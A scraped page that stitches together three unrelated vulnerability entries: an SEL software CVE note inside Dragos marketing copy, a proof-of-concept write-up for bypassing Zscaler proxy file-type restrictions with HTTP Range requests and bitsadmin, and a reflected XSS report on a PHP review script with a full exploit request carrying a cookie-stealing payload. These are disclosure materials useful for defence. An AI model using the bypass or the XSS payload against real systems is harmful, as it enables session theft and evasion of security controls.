SEL acSELerator Bay Screen Builder software is distributed by SEL-5033 SEL acSELerator RTAC, SEL-5030 Quickset, and SEL Compass. CVE-2023-31167 and was patched in the acSELerator Bay Screen Builder release available on 20230602. Please contact SEL for additional details.


This issue affects SEL-5036 acSELerator Bay Screen Builder Software: before 1.0.49152.778.



**Industrial Cybersecurity for OT Environments​**

The most effective OT cybersecurity platform, codifying threat intelligence and insights from the industry's largest team of ICS/OT practitioners.

Discover Why Dragos

**Visibility, Detection, and Response for OT Cyber Threats and Vulnerabilities**

The **Dragos Platform** gives you visibility into your ICS/OT assets, vulnerabilities, threats, and response actions, and supports you with forensics and OT-specific playbooks.

**In-Depth Asset Visibility**

The Dragos Platform analyzes multiple data sources including protocols, network traffic, data historians, host logs, asset characterizations, and anomalies to provide unmatched visibility of your ICS/OT environment.

**Unrivaled Threat Detection**

Based on the industry’s best threat intelligence, pinpoint malicious activity on your ICS/OT network, providing in-depth context for alerts, and reducing false positives for unparalleled threat detection.

Dragos Platform

OT Expertise Codified

**Comprehensive Vulnerability Management**

The only ICS/OT solution that provides corrected, prioritized guidance with full lifecycle vulnerability management, tracking historical disposition through automated collection & analysis.

**Investigation and Response**

Expert-authored playbooks to guide your security team step-by-step throughout investigations, decreasing response time and improving the efficiency of your team’s workflow.

**Your Path to Industrial Cybersecurity**

**Secure Your Digital Transformation**

Successfully transform your business and keep your operational technology (OT) environments secure.

**Industrial Cyber Risk Management**

Assess your industrial cyber risk and confidently respond to cyber incidents.

**Ensure ICS/OT Cybersecurity Compliance**

Create simplified, repeatable processes to meet audit and compliance requirements faster and more accurately.

**Solve Your Challenges**

**Start My Industrial Cybersecurity Program**

Are you ready to get your ICS/OT cybersecurity challenges under control? We are here to help you take the next step.

**Improve Visibility of My OT Assets**

You can’t protect what you can’t see. A successful OT security posture maintains an inventory of assets, maps vulnerabilities against those assets, and actively monitors traffic for potential threats.

**Defend Against Ransomware in OT**

OT networks can be directly impacted when ransomware cripples IT. Know what you can do to better protect against this increasing threat.

**Understand the Global Threat Landscape**

Dragos Worldview Threat Intelligence provides the proactive information you need to stay ahead of sophisticated industrial cybersecurity threats.

**Leverage MITRE ATT&CK for ICS**

See how defenders can operationalize MITRE ATT&CK for ICS with the Dragos Platform and Worldview Threat Intelligence.

**The Leader in Industrial Cybersecurity**

Dragos has unmatched experience securing industrial assets across vertical industries.

Chemical

Chemical

Protect the operational technology that helps run chemical production facilities and the valuable intellectual property regarding chemical formulas from a potential cyber attack.

Electric

Electric

Take a proactive, holistic approach to protect the full spectrum of operations and defend your critical electric infrastructure.

Food & Bev

Food & Bev

Benefit from in-depth visibility of assets and threats in your environment, along with playbooks to guide analysts step-by-step as they investigate potential incidents.

Manufacturing

Manufacturing

Analyze the entire spectrum of manufacturing production inputs from support systems, quality control systems, material handling technologies, and automation/control technologies.

Oil & Gas

Oil & Gas

Combine OT threat intelligence, professional services, and the most effective and efficient ICS cybersecurity technology to enhance visibility, detection, and response capabilities in oil and gas environments.

Pharmaceuticals

Pharmaceuticals

Analyze the entire OT spectrum—including systems for processing, quality control, enterprise resource planning, and other critical operations

Transportation

Transportation

Understand supply chain vulnerabilities, IT to OT convergence, and manage network asset inventory in order to systematically reduce cyber risk.

Water

Water

Protect community water & wastewater systems by preventing significant breaches with proactive defense.

**We Understand Industrial Adversaries Better Than Anyone — So You Can Too**

Our experts are the leading authorities in ICS/OT cybersecurity, with real-world experience with landmark attacks on OT networks.

Jodi Schatz

Chief Product Officer

Jon Lavender

Chief Technology Officer and Head of Product

Christophe Culine

President of Global Sales and Chief Revenue Officer

Ben Miller

Vice President Professional Services and R&D

Robert M. Lee

Chief Executive Officer

**What Dragos Customers Say**

“We are convinced that Dragos has significantly helped us increase our overall security posture – as well as our ability to provide the best service possible to our customers. We couldn’t ask for anything better.”

“The Dragos OT Watch team, enabled by Dragos Platform technology, provides a level of visibility into our assets and threats that we did not have the expertise nor the bandwidth to do on our own.”

Doug Short,

CIO & CISO Trinity River Authority of Texas

“Where Dragos differentiates from many \[competitors\] is in the ICS-focused expertise of its team, reflected in its intelligence-centric approach, where its deep and detailed knowledge of the specifics of the ICS threat landscape are born out of experience.”

**Working together with partners to protect you**

No matter where you are on your ICS/OT cybersecurity journey, we have the products and services you need. Let us help get you on the path to success.

CVE-2023-31167: Industrial Cybersecurity Technology for ICS/OT Asset Visibility | Dragos​

Inappropriate file type control in Zscaler Proxy versions 3.6.1.25 and prior allows local attackers to bypass file download/upload restrictions.

**CVE-2023-41717**

Inappropriate file type control in Zscaler Proxy versions 3.6.1.25 and prior allows local attackers to bypass file download/upload restrictions.

**Executive Summary**

During the summer of 2022, I have found a vulnerability affecting the ZScaler proxy (versions 3.6.1.25 and prior). This vulnerability would allow local attackers to bypass the restriction on downloads/uploads of password-protected archives using tools like Burp or even native Microsoft utilities like Bitsadmin, which relies on the Background Intelligent Transfer Service (BITS) protocol.

Per Microsoft’s documentation, the BITS protocol _“defines a way to transfer large payloads from a client to an HTTP server or vice versa, even in the face of interruptions, by sending the payload in multiple fragments”_. This allows to bypass restrictions based on file type as Zscaler is not able to properly reconstruct the file across multiple requests.

Although this proof of concept will focus only on the _download_ aspect, this vulnerability applies to the uploads as well.

**Proof of Concept**

In this section, two different methods for bypassing Zscaler’s restrictions on downloading password-protected archives are highlighted. Tests were performed on version 3.6.1.25 of the client, using the following URL.

**Method 1: Manual crafting of HTTP requests**

The first method involves modifying HTTP request, which can be done either using a browser or a tool like Burp Suite. For the sake of this test, I have chosen the former.

The image below shows the request being intercepted and blocked by Zscaler. The request is then retransmitted after adding the Range header with value bytes = 0-x, where x is an arbitrary value smaller than the total file size.

Once the request is retransmitted, a response with status code “206 Partial Content” is received. The response headers will show the total file size, while the response payload is encoded in base64.

The requests are repeated by manually increasing the byte range value, until the last file chunk is reached.

The resulting payload can be reconstructed in various ways: for this test, a custom Powershell script has been used (you can find it in **Reconstruct-Payload.ps1**).

The MD5 hash of the reconstructed zip file (CE6CFFEA60C6CDF40C998E56B6EFBD20) matches the expected one found on Virus Total.

**Method 2: BITS**

The second method leverages Microsoft's BITS protocol, which natively splits the download requests in chunks.

This test has been done using the CLI utility **bitsadmin.exe**, with the following command line:

bitsadmin.exe /transfer <job name> /download /priority normal <URL> <path_destination_file>

The resulting zip’s MD5 hash matches the one found in the previous section.

CVE-2023-41717: GitHub - federella/CVE-2023-41717: This repository is to provide a write-up and PoC for CVE-2023-41717.

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

Tag

#git